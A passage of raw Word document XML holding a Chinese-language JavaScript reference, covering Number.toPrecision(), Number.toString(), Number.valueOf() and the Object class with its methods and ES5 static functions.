        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>之间，包括</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>。不同的实现环境可能支持更大或更小的精度值。如果省略这个参数，则将调用</w:t>
      </w:r>
      <w:r>
        <w:t>toSt</w:t>
      </w:r>
      <w:r>
        <w:t>ring()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将当前数字转换为一个十进制的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>precision</w:t>
      </w:r>
      <w:r>
        <w:t>位有效数字的数字字符串。如果</w:t>
      </w:r>
      <w:r>
        <w:t>precision</w:t>
      </w:r>
      <w:r>
        <w:t>足够大，包括当前数字的所有整数部分，则返回值将使用定点记数法表示。其他情况下，将使用指数记数法，小数点之前有一个数字，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>小数点之后有</w:t>
      </w:r>
      <w:r>
        <w:t>precision-1</w:t>
      </w:r>
      <w:r>
        <w:t>个数字。根据需要，这个数字将四舍五入或末尾补</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>precision</w:t>
      </w:r>
      <w:r>
        <w:t>参数太小或太大。</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值，包括</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>，不会产生</w:t>
      </w:r>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，不同的实现环境可能支持更大或更小的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</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n=12345.6789;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1e+4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1.23e+4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(5);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>12346</w:t>
      </w:r>
      <w:r>
        <w:t>：注意四舍五入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>12345.67890</w:t>
      </w:r>
      <w:r>
        <w:t>：注意末尾补的</w:t>
      </w:r>
      <w:r>
        <w:t>0</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Number.toExponential()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toFixed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="718" w:name="Number_toString__"/>
      <w:r>
        <w:t>Number.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="718"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个数字转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>number.toString(radix)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可选参数，指定数字转换后的进制。如果省略，将使用</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>。不过需要注意，如果指定了这个参数，并且值不是</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准允许返回任意值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前数字在指定进制下的字符串形式。</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lastRenderedPageBreak/>
        <w:t>这个方法在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将一个数字转换为字符串。当</w:t>
      </w:r>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
      <w:r>
        <w:t>参数省略或值为</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>时，数字将转换为一个十进制的数字字符串。虽然</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准不要求实现处理</w:t>
      </w:r>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
      <w:r>
        <w:t>的其他值，但常用的所有实现都可以接受</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.toExponential()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toFixed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.toPrecision()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="719" w:name="Number_valueOf__"/>
      <w:r>
        <w:t>Number.valueOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="719"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回原始的</w:t>
      </w:r>
      <w:r>
        <w:t>数字值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>number.valueOf()</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当前</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象的原始数字值。很少需要显式地调用这个方法。</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这个方法在一个非</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="720" w:name="Object"/>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="720"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含所有</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的特性的超类</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Object()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new Object(value)</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lastRenderedPageBreak/>
        <w:t>这个可选的参数指定一个原始的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>一个数字、布尔值或字符串，这些值将分别转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有传入</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则这个构造函数将返回一个新创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>实例。如果传入一个原始</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>值，则构造函数将创建并返回一个原始值的</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象封装。如果不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，将</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数像函数那样调用，则它的行为将和使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>引用当前对象的构造函数（一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hasOwnProperty()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查对象是否拥有一个指定名字的本地定义（而不是继承）的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查当前对象是不是指定对象的原型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>propertyIsEnumerable()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查指定名字的属性是否存在并且可以用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环枚举。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该对象的一个本地化的字符串表示。这个方法的默认实现只是简单地调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，不过子类可以覆盖它，以便提供本地化实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toStri</w:t>
      </w:r>
      <w:r>
        <w:t>ng()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回该对象的一个字符串表示。</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>类实现的这个方法非常宽泛，不能提供很多有用的信息。</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的子类通常会通过自定义的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将它覆盖，以便提供更多有用的输出信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前对象的原始值，如果存在原始值的话。对类型为</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的对象来说，这个方法只是简单地返回该对象本身。</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的子</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>类（如</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>）则重载这个方法，以便返回与该对象相关的原始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>静态方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数也为以下全局函数提供了命令空间：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用指定的原型及属性创建一个新的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建或配置指定对象的一个或多个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建或配置指定对象的某个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将指定对象设置为不可改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查询指定对象的指定属性的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object.getOwnPropertyName</w:t>
      </w:r>
      <w:r>
        <w:t>s()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个包含指定对象的所有非继承属性名的数组，包括不可枚举属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getPrototypeOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定对象的原型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
